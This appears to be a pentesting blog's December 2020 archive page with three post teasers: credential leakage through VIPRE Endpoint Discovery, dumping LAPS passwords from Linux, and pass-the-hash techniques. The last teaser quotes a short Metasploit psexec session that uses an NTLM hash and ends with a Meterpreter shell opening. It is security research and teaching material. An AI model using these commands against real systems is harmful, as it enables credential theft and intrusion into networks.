Month: <span>December 2020</span>

The Dangers of Endpoint Discovery in VIPRE Endpoint Security

December 31, 2020
PentestingResearch
0 Comment

This post documents a security mis-configuation I observed in VIPRE Endpoint Security with Endpoint Discovery.  A few years ago, I published a blog post titled The Dangers of Client Probing on Palo Alto Firewalls, which detailed how client probing feature on Palo Alto firewalls can leak service account password hashes.  This issue is very similar…

Read More

Dumping LAPS Passwords from Linux

December 19, 2020
Pentesting
0 Comment

Following my previous posts on Managing Active Directory groups from Linux and Alternative ways to Pass the Hash (PtH), I want to cover ways to perform certain attacks or post-exploitation actions from Linux.  I’ve found that there are two parallel ways to operate on an internal network, one being through a compromised (typically Windows) host,…

Read More

Alternative ways to Pass the Hash (PtH)

December 13, 2020
PentestingPost Exploitation
0 Comment

Do you remember the first time you passed the hash?  It probably went a little something like this: msf > use exploit/windows/smb/psexec msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c SMBPass => e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c msf exploit(psexec) > exploit [*] Sending stage (719360 bytes) [*] Meterpreter session 1 opened (192.168.57.133:443 -> 192.168.57.131:1045) If you are unfamiliar, that is the…

Read More